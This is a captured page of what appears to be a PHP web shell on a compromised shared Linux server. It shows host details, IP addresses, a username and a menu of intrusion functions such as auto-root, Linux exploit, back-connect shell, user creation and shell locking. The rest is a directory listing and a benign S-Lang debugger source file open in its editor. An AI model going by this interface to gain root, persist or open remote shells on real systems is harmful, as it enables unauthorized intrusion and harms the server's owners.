Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
slsh /
[ HOME SHELL ]
Name
Size
Permission
Action
cmaps
[ DIR ]
drwxr-xr-x
help
[ DIR ]
drwxr-xr-x
rline
[ DIR ]
drwxr-xr-x
scripts
[ DIR ]
drwxr-xr-x
arrayfuns.sl
1.85
KB
-rw-r--r--
autoload.sl
460
B
-rw-r--r--
base64.sl
19
B
-rw-r--r--
chksum.sl
1.58
KB
-rw-r--r--
cmdopt.sl
7.58
KB
-rw-r--r--
csv.sl
16.35
KB
-rw-r--r--
fcntl.sl
35
B
-rw-r--r--
fork.sl
17
B
-rw-r--r--
fswalk.sl
2.36
KB
-rw-r--r--
glob.sl
2.42
KB
-rw-r--r--
histogram.sl
2.98
KB
-rw-r--r--
iconv.sl
35
B
-rw-r--r--
json.sl
5.97
KB
-rw-r--r--
listfuns.sl
3.04
KB
-rw-r--r--
onig.sl
17
B
-rw-r--r--
pcre.sl
1.21
KB
-rw-r--r--
png.sl
4.02
KB
-rw-r--r--
print.sl
7.61
KB
-rw-r--r--
process.sl
9.83
KB
-rw-r--r--
profile.sl
19.88
KB
-rw-r--r--
rand.sl
4.28
KB
-rw-r--r--
readascii.sl
5.24
KB
-rw-r--r--
require.sl
1.27
KB
-rw-r--r--
select.sl
37
B
-rw-r--r--
setfuns.sl
4.8
KB
-rw-r--r--
sldb.sl
2.11
KB
-rw-r--r--
sldbcore.sl
18.1
KB
-rw-r--r--
sldbsock.sl
7.43
KB
-rw-r--r--
slshhelp.sl
536
B
-rw-r--r--
slshrl.sl
9.23
KB
-rw-r--r--
slsmg.sl
35
B
-rw-r--r--
socket.sl
151
B
-rw-r--r--
stats.sl
15.07
KB
-rw-r--r--
stkcheck.sl
2.62
KB
-rw-r--r--
structfuns.sl
2.05
KB
-rw-r--r--
sysconf.sl
20
B
-rw-r--r--
termios.sl
39
B
-rw-r--r--
varray.sl
37
B
-rw-r--r--
zlib.sl
2.93
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sldb.sl
% Copyright (C) 2012-2017,2018 John E. Davis % % This file is part of the S-Lang Library and may be distributed under the % terms of the GNU General Public License. See the file COPYING for % more information. %--------------------------------------------------------------------------- require ("sldbcore"); private define vmessage_method () { variable args = __pop_args (_NARGS); () = fprintf (stdout, __push_args (args)); () = fflush (stdout); } private define open_file_at_linenum (file, linenum) { if (path_extname (file) == ".slc") file = path_sans_extname (file) + ".sl"; variable fp = fopen (file, "r"); if (fp == NULL) { vmessage_method ("Unable to open %s\n", file); return NULL; } if (linenum == 1) return fp; foreach (fp) using ("line") { variable line = (); linenum--; if (linenum == 1) break; } return fp; } private define list_method (file, linemin, linemax) { variable n = linemax - linemin + 1; foreach (open_file_at_linenum (file, linemin)) { variable line = (); vmessage_method ("%d\t%s", linemin, line); %vmessage_method ("> %s:%d %s", file, linemin, line); linemin++; if (linemin > linemax) break; } } #ifexists slsh_readline slsh_readline_init ("SLDB"); private variable Rline = NULL; private define close_readline () { Rline = NULL; } Rline = slsh_readline_new ("sldb"); atexit (&close_readline); #endif private define read_input_method (prompt, default_cmd) { variable line; forever { try { #ifexists slsh_readline line = slsh_readline (Rline, prompt); #else () = fputs (prompt, stdout); () = fflush(stdout); if (-1 == fgets (&line, stdin)) line = NULL; #endif } catch UserBreakError: continue; if (line == NULL) break; line = strtrim (line, "\t \n"); if (line == "") { if (default_cmd != NULL) return default_cmd; continue; } break; } return line; } define sldb_initialize () { variable m = sldb_methods (); m.list = &list_method; m.vmessage = &vmessage_method; m.read_input = &read_input_method; m.pprint = &print; } provide ("sldb");
Close